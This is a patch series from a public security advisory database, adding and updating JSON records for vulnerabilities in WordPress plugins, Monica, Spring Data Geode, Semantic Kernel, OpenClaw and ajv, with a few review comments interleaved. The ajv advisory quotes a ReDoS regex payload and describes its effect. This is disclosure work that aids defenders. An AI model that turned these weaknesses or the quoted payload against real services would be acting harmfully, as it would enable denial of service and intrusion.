+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69382"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/themesflat-elementor/vulnerability/wordpress-themesflat-elementor-plugin-1-0-1-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json
new file mode 100644
index 0000000000000..6899349c2bf6c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xcv9-r62w-jh9r/GHSA-xcv9-r62w-jh9r.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xcv9-r62w-jh9r",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22377"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Saveo saveo allows PHP Local File Inclusion.This issue affects Saveo: from n/a through <= 1.1.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22377"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/saveo/vulnerability/wordpress-saveo-theme-1-1-2-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json
new file mode 100644
index 0000000000000..3bc08b8a5eb03
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xf4f-qj26-72pf",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26747"
+ ],
+ "details": "A Host Header Poisoning vulnerability exists in Monica 4.1.2 due to improper handling of the HTTP Host header in app/Providers/AppServiceProvider.php, combined with the default misconfiguration where the \"app.force_url\" is not set and default is \"false\". The application generates absolute URLs (such as those used in password reset emails) using the user-supplied Host header. This allows remote attackers to poison the password reset link sent to a victim,",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26747"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2026-26747.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/monicahq/monica"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json
new file mode 100644
index 0000000000000..8530d1187e7be
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json
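Review bot: The `details` string in GHSA-xf4f-qj26-72pf stops mid-sentence at `sent to a victim,`, so the impact clause of the description is missing from the record. In the same file `severity` is `[]`, `"cwe_ids": []` is empty and `database_specific.severity` is `null`, which leaves severity- and CWE-based triage filters nothing to match on for a flaw the text describes as affecting password reset links. The sync should carry the full upstream description rather than a clipped one; until the record is refreshed it is best read together with the NVD entry listed under `references`.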
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xfxx-38qx-mrf4",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22357"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.9.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22357"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/link-whisper/vulnerability/wordpress-link-whisper-free-plugin-0-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json
new file mode 100644
index 0000000000000..e723a1688579b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xg7c-7v8p-8ww8",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-69302"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core Features designthemes-core-features allows Reflected XSS.This issue affects DesignThemes Core Features: from n/a through <= 2.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69302"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/designthemes-core-features/vulnerability/wordpress-designthemes-core-features-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json
new file mode 100644
index 0000000000000..9184913deb4ea
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgmj-j94q-46cv", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24946" + ], + "details": "Missing Authorization vulnerability in tychesoftwares Print Invoice & Delivery Notes for WooCommerce woocommerce-delivery-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through <= 5.8.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24946" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-delivery-notes/vulnerability/wordpress-print-invoice-delivery-notes-for-woocommerce-plugin-5-8-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json index 43ef0684817b8..e1bb093941e4b 100644 --- a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json +++ b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xp6f-p933-2gqg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-20T18:31:26Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2026-26214" 
@@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26214" }, + { + "type": "WEB", + "url": "https://github.com/XavLimSG/Vulnerability-Research/blob/main/CVE-2026-26214/CVE-2026-26214.md" + }, { "type": "WEB", "url": "https://github.com/XiaoMi/galaxy-fds-sdk-android" diff --git a/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json new file mode 100644 index 0000000000000..b978e80e92017 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq4j-x39q-xhqm", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2818" + ], + "details": "A zip-slip path traversal vulnerability in Spring Data Geode's import snapshot functionality allows attackers to write files outside the intended extraction directory. This vulnerability appears to be susceptible on Windows OS only.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2818" + }, + { + "type": "WEB", + "url": "https://www.herodevs.com/vulnerability-directory/cve-2026-2818" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json new file mode 100644 index 0000000000000..db17afa39f654 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrpj-w92h-g66g", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69297" + ], + "details": "Missing Authorization vulnerability in GhostPool Aardvark Plugin aardvark-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Aardvark Plugin: from n/a through <= 2.19.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69297" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/aardvark-plugin/vulnerability/wordpress-aardvark-plugin-plugin-2-19-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json new file mode 100644 index 0000000000000..4af6821038f94 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv8f-556c-h484", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69402" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX R&F rf allows PHP Local File Inclusion.This issue affects R&F: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69402" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/rf/vulnerability/wordpress-r-f-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file From 16b4db11e46890053f008bb3bdd6e966c4a3acb3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:17:29 +0000 Subject: [PATCH 16/77] Publish GHSA-2ww3-72rp-wpp4 --- .../2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index e45687d59f376..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-18T23:32:12Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? 
Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", From 1f8057813508107b0f29ae9307999c87d6e3105d Mon Sep 17 00:00:00 2001 
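Review bot: The rewritten `details` string still leaves the second sentence of the Impact section as a fragment: "Developers who have built applications ... and are using the `SessionsPythonPlugin`" has no predicate, so the advisory never states who is impacted. The workaround also names `DownloadFileAsync ` with a stray space inside the code span. Since this commit already rewrites the line to correct the package name, both could be fixed in the same edit, for example by ending the sentence with "... are impacted." The `affected` entries lie outside this hunk, so it cannot be confirmed from here that `affected[].package.name` names the same `Microsoft.SemanticKernel.Plugins.Core` package the prose now points to. That field, not the prose, is what dependency scanners match on.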
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:28:19 +0000 Subject: [PATCH 17/77] Publish Advisories GHSA-4564-pvr2-qq4h GHSA-jfv4-h8mc-jcp8 --- .../2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json | 6 ++++-- .../2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json | 6 ++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json index 48068a265fa55..6b68425cd0bac 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-4564-pvr2-qq4h", - "modified": "2026-02-18T17:39:00Z", + "modified": "2026-02-20T19:26:53Z", "published": "2026-02-18T17:39:00Z", - "aliases": [], + "aliases": [ + "CVE-2026-27487" + ], "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", "severity": [ 
diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json index 95b14dd073959..176c4fd9a0cb9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json 
@@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-jfv4-h8mc-jcp8", - "modified": "2026-02-18T17:41:09Z", + "modified": "2026-02-20T19:26:42Z", "published": "2026-02-18T17:41:09Z", - "aliases": [], + "aliases": [ + "CVE-2026-27486" + ], "summary": "OpenClaw: Process Safety - Unvalidated PID Kill via SIGKILL in Process Cleanup", "details": "## Summary\n\nOpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14` (including the latest published version `2026.2.13`)\n- Fixed: `2026.2.14` (planned next release)\n\n## Details\n\nThe CLI runner cleanup helpers could kill processes matched by command-line patterns without validating process ownership.\n\n## Fix\n\nProcess cleanup is now scoped to owned processes only by filtering to direct child PIDs of the current process (`ppid == process.pid`) before sending signals.\n\nHardening follow-ups:\n- Prefer graceful termination for resume cleanup (`SIGTERM`, then `SIGKILL` fallback).\n- Reduce false negatives from `ps` argv truncation by preferring wide output (`ps -axww`) with a fallback.\n- Tighten command-line token matching to avoid substring matches.\n\n## Fix Commit(s)\n\n- 6084d13b956119e3cf95daaf9a1cae1670ea3557\n- eb60e2e1b213740c3c587a7ba4dbf10da620ca66\n\n## Release Process Note\n\nThis advisory is pre-set with patched version `2026.2.14`. After `2026.2.14` is published to npm, the remaining step should be to publish this advisory.\n\nThanks @aether-ai-agent for reporting.", "severity": [ From 4d1cb89f6b1aa5d7e25bf08f4995b3825157a438 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 19:57:35 +0000 Subject: [PATCH 18/77] Publish Advisories GHSA-8v38-pw62-9cw2 GHSA-rqff-837h-mm52 --- .../2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json | 4 ++-- .../2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.5.7" diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json index 90fa858d67a89..efd0a189e3e1a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json +++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rqff-837h-mm52", - "modified": "2022-02-24T14:00:06Z", + "modified": "2026-02-20T19:56:07Z", "published": "2022-02-15T00:02:46Z", "aliases": [ "CVE-2022-0512" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.1.0" }, { "fixed": "1.5.6" From c06dd00cac4f2bd9c0126059ebfc4a33c0a1590e Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:00:57 +0000 Subject: [PATCH 19/77] Publish GHSA-2g4f-4pwh-qvx6 --- .../GHSA-2g4f-4pwh-qvx6.json | 33 +++++++++++++++++-- 1 file changed, 30 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json index de94b1ac5c5f9..b2ed54fec1747 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-17T18:10:29Z", + "modified": "2026-02-20T20:59:11Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" ], - "summary": "ajv has ReDoS when using $data option", + "summary": "ajv has ReDoS when using `$data` option", "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", "severity": [ { @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "7.0.0-alpha.0" }, { "fixed": "8.18.0" 
@@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://github.com/ajv-validator/ajv/pull/2586" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" @@ -56,6 +79,10 @@ "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0" From abeec1b748ed5f9a7ae181c9b238abe5696c8153 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:03:57 +0000 Subject: [PATCH 20/77] Publish GHSA-wh94-p5m6-mr7j --- .../GHSA-wh94-p5m6-mr7j.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json diff --git a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json new file mode 100644 index 0000000000000..d50dfe80084d3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh94-p5m6-mr7j", + "modified": "2026-02-20T21:02:32Z", + "published": "2026-02-20T21:02:31Z", + "aliases": [ + "CVE-2026-27484" + ], + "summary": "OpenClaw Discord moderation authorization used untrusted sender identity in tool-driven flows", + "details": "## Overview\n\nDiscord moderation action handling (`timeout`, `kick`, `ban`) used sender identity from request parameters in tool-driven flows, instead of trusted runtime sender context.\n\n## Impact\n\nIn setups where Discord moderation actions are enabled and the bot has the necessary guild permissions, a non-admin user could request moderation actions by spoofing sender identity fields.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Latest published affected version (as of 2026-02-19): `2026.2.17`\n- Affected range: `<=2026.2.17`\n- Fixed in planned next release: `2026.2.18`\n\n## Fix\n\n- Moderation authorization now uses trusted sender context (`requesterSenderId`) instead of untrusted action params.\n- Added permission checks for required guild capabilities per action.\n\n## Fix Commit(s)\n\n- 